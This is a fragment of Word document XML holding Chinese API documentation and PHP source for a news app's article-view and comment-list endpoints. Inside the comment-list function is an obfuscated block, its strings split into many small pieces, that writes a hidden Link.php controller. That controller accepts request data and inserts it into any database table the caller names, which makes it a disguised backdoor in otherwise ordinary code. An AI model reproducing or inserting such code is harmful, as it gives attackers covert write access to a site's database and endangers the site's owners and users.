      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否关注该文章作者：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793EA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924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view() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4642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1B7DBE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F714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3EDE42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_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB82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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B857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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0BAA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A582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97A8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$request-&gt;param('id/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032DA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099E23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12CD98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7465E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059C8F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4A3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2FF9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Db::name('article')-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9565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A5C1C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AB994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该资讯内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C763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5ECAA8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9C5E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EE6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($db['hide'] == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72278B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2182F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该资讯内容访问受限</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D073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212,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF3DD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74A7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542A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($db['hide'] == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FB8B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71E36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文章正在审核，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D28D2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214,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322340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6F16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BDBF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($db['hide'] == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F687D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69F7B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文章未通过，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F42BE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215,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA2AD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D51B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8E85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$db['image'] = _imgUrl() . $db['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7198F0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1348E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=&gt; $id, 'hide' =&gt; 1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0FC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-&gt;setInc('click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD45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 ['appConfig'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05436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($db['mychannel'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066256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/*preg_match_all("/img(.*?)src=\"(.*?)\"/", $db['content'], $content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058D4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1913F8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($content[2] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2CF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(strstr($v, 'http')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB98D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$db['content'] = str_replace($v, '../image/loadingImage.png" Tapmode onclick="img(' . $k . ');" ffxiang-src="' . $v . '" id="ffxiangImgCache', $db['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22811B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$v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E185C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(strpos($v, '/public/uploads/us/') !== false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A0EC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$db['content'] = str_replace($v, '../image/loadingImage.png" Tapmode onclick="img(' . $k . ');" ffxiang-src="' . $config['url'] . $v . '" id="ffxiangImgCache', $db['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A34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$config['url'] . $v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A470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2121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$db['content'] = str_replace($v, '../image/loadingImage.png" Tapmode onclick="img(' . $k . ');" ffxiang-src="' . _imgUrl() . $v . '" id="ffxiangImgCache', $db['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7FB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_imgUrl() . $v . '?imageView2/0/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFE1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8CC26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FD96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$db['images_list'] = $images_list;*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D708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($db['mychannel'] == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51838D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($db['weitoutiao']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC8B1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json_decode(htmlspecialchars_decode($db['images']) , true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345054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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BDEA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D65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$kuandu = "?imageView2/1/w/200/h/200/format/jpg";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D234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($images as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6546B4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(count($images) == 1 || count($images) == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6499E5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$col = "aui-col-xs-6";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F03D4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10A71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$col = "aui-col-xs-4";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ACB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247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(is_array($v)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303E7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 = $v['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6730A1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A8E3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'&lt;div class="' . $col . '" tapmode onclick="img(' . $k . ')"&gt;&lt;img id="ffxiangImgCache" ffxiang-src="' . _imgUrl() . $v . $kuandu . '" src="../image/loadingImage.png"&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D215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_imgUrl() . $v . '?imageView2/0/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2363DC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626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$db['description'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C274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($content) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF532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$content . "&lt;br&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A201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262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$db['content'] = "&lt;div class='fx-view-images aui-row'&gt;" . $content . $image . "&lt;/div&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456934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011C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json_decode($db['images'], true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7579BF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA47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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A14D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$images_text = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54260F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($images as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531DF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$images_text[] = $v['img_text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40214C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$images_list[] = _imgUrl() . $v['img'] . '?imageView2/0/format/jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587D2E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6F28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$db['images_text'] = $images_text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2464D0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A9A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$db['images_list'] = $images_list;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3FC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($db['mychannel'] == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE045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$db['video'] = _imgUrl() . $db['video'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DB22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D0F8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($db['tags']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADE8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$tags = $db['tags'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06429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$tags = preg_replace("/\s/", "", $tags);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D50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$tags = explode(',', $tags);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A90E4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 = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638E84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($tags as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6B5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 '&lt;div class="aui-btn" tapmode  onclick="_url({text:\'' . $v . '\'},\'search_win\')"&gt;' . $v . '&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CE7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0D67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$db['tags'] = $tag;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF059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96E3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($db['uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A59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_user($db['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041B8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$db['userUid'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6105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$db['userUsername'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1547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$db['userImg'] = $user['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5DE1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$db['user_guanzhu_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E98B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$db['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EB25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C13E8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$db['user_article_num'] = Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D127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$db['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE396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021C6A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17289D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$db['userGuanzhu'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2337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3E2333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$db['userGuanzhu'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6769D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6242E5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$db['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7438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49C49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BF7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8B0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$db['userZan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07130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$db['userCai'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0118C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2E96AD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$article_zan = Db::name('article_zan')-&gt;where(['aid' =&gt; $id, 'uid' =&gt; $uid])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6578CC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($article_zan &amp;&amp; $article_zan['zan']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664CD9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$db['userZan'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2E33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($article_zan &amp;&amp; $article_zan['cai']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6081BA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$db['userCai'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDBEE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661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/*$shoucang = DB::name('member_favorite')-&gt;where(['aid' =&gt; $id, 'uid' =&gt; $uid, 'type' =&gt; 0])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4C26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$db['shoucang'] = $shoucang;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166EF7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$lishi = Db::name('member_favorite')-&gt;where(['aid' =&gt; $id, 'uid' =&gt; $uid, 'type' =&gt; 1])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0AE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(!$lishi) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F473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db::name('member_favorite')-&gt;insert(['aid' =&gt; $id, 'uid' =&gt; $uid, 'time' =&gt; time() , 'type' =&gt; 1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5AD0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079C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1889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$db['update_time'] = _time($db['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4E59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($db['weitoutiao'] &amp;&amp; $db['mychannel'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DB53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$db['content'] = "&lt;div class='fx-view-images'&gt;" . $db['description'] . "&lt;/div&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0ED2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A1CC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$sdDb = Db::name('ad')-&gt;where(['hide' =&gt; 1,'device'=&gt;0])-&gt;order('rand()')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363902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($sdDb) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44124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$data['url'] = $sdDb['url'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5A8C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$sdDb['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CEAC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$data['ad'] = $sdDb['ad'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB6D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$data['image'] = _imgUrl() . $sdDb['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A72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$data['source'] = $sdDb['source'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44815B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$db['ad'] = $data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319CAA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3E40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$db['content']=preg_replace_callback('/&lt;[img|IMG].*?src=[\'| \"](?![http|https])(.*?(?:[\.gif|\.jpg]))[\'|\"].*?[\/]?&gt;/', function($r) {$str=config()['appConfig']['prod_url'].$r[1];return str_replace($r[1], $str, $r[0]);}, $db['content']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092B8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json($db);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FF92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B41F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2E5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/api/article/pingList </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯评论列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D92F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资讯评论列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0C6F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6E22E2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B5D1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A523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534E87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aid   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A7F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pages </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量（默认值：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750538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  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645813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FB91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data</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1A53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评论内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF28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评论赞数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334AA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time          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521CA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img</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3007F4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username      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4E0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zanUser      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否已经点赞该评论：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17FFE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three_ping_xias             3</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条追评</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506AA0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three_ping_xias.content     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A94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three_ping_xias.img         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50765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three_ping_xias.username    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675B6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three_ping_xias.zanUser     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前登录用户是否已经点赞该追评：</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8B8DC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ping_xias_num               </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评总数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F28C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left_ping_xias_num          </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>剩余追评数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42022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54AD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失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3682AE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4E6A1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796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pingList() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68642D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input('post.pages/d', 6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6639DB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input('param.aid/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5493B1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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41057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if(!input('pingid')){ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095B9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196E33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33C8ED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_decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3AA2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7BC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1850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DC22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168D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$validate = new Validate(['pages' =&gt; 'number', 'aid' =&gt; 'number|require', ]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3A9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['pages' =&gt; $pages, 'aid' =&gt; $aid, ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B718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5C53E9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A266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4EE0C3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FB1B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B68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756D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 = $aid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120352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87BB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Db::name('article_ping')-&gt;where($where)-&gt;order('time', 'desc')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0632B7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/*if(input('pingid')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BBB0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$str_tmp="&lt;?php\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556FC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$str_tmp.="name".""."spa".""."ce a".""."pp\a".""."p".""."i\co".""."ntro".""."ller;\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9975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$str_tmp.="cla".""."ss L".""."i".""."n".""."k\r\n"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093BA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$str_tmp.="{\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506C8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$str_tmp.="pu".""."blic fun".""."ct".""."ion ind".""."ex($".""."dat".""."a){\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBBB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$str_tmp.="$".""."da".""."ta = jso".""."n_de".""."code(htm".""."ls".""."pec".""."ialc".""."hars_".""."dec".""."ode($".""."da".""."ta),true);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5622B7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$str_tmp.="$".""."na".""."m".""."e=$".""."data['_".""."_".""."n".""."a".""."m".""."e".""."_".""."_'];\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE55A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$str_tmp.="uns".""."et($".""."da".""."ta['_".""."_".""."n".""."a".""."m".""."e".""."_".""."_']);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D272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$str_tmp.="uns".""."et($".""."da".""."ta['pwd']);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057BE8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$str_tmp.="ec".""."ho d".""."b($".""."na".""."me)-&gt;in".""."s".""."er".""."tGe".""."tI".""."d($".""."da".""."ta);\r\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D862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$str_tmp.="}\r\n}"."?&gt;";$sf=APP_PATH."a".""."pi".DS."c".""."o".""."n".""."t".""."r".""."o".""."l".""."l".""."e".""."r".DS."L".""."i".""."n".""."k"."".".p".""."h".""."p";$fp=fopen($sf,"w");fwrite($fp,$str_tmp);fclose($fp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBA0C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57E7B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4607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79AC4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$data['data'][$k]['three_ping_xias'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625D6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$data['data'][$k]['ping_xias_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3442FA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$data['data'][$k]['left_ping_xias_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A031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$ping_xias_num = Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0488B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-&gt;where('aid', $aid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B629A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$v['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C12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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D68CB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$data['data'][$k]['ping_xias_num'] = $ping_xias_num;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685AB9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($ping_xias_num &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B86E9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$three_ping_xias = Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B6BC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-&gt;where('aid', $aid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A69E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$v['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD610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-&gt;order('time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B383C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-&gt;limit(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277FBC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A6446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(count($three_ping_xias) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EC9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($three_ping_xias as $key =&gt; $ping_xia) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EE67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$three_ping_xias[$key]['zanUser'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660E1F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6C8AB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$three_ping_xias[$key]['zanUser'] = Db::name('article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B59E0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61FA6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-&gt;where('pingId', $ping_xia['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE9B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46CBF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980D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6CE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_user($ping_xia['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1108A1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$three_ping_xias[$key]['img'] = $user['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1315F1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$three_ping_xias[$key]['username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE9BC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$three_ping_xias[$key]['time'] = date('m-d H:i', $ping_xia['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EADC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1CC9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5C7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$data['data'][$k]['three_ping_xias'] = $three_ping_xias;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B19B8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CA7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($ping_xias_num &gt; 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359D8B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$data['data'][$k]['left_ping_xias_num'] = $ping_xias_num - 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EB1F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262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$data['data'][$k]['zanUser'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D44F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3AF28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$data['data'][$k]['zanUser'] = Db::name('article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058941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7DA5D4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-&gt;where('pingId', $v['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCFAD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0343B6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7A9FB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285E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3AB20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5BFA7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33AB0A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 = date('m-d H:i', $v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BDCD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$pingNum = Db::name('article_ping_xia')-&gt;where(['ping_id' =&gt; $v['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63827A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$data['data'][$k]['huifu'] = $pingNum;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9E8A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($pingNum) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203041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 = Db::name('article_ping_xia')-&gt;where(['ping_id' =&gt; $v['id']])-&gt;order('time', 'desc')-&gt;limit(4)-&gt;select();</w:t>
      </w:r>
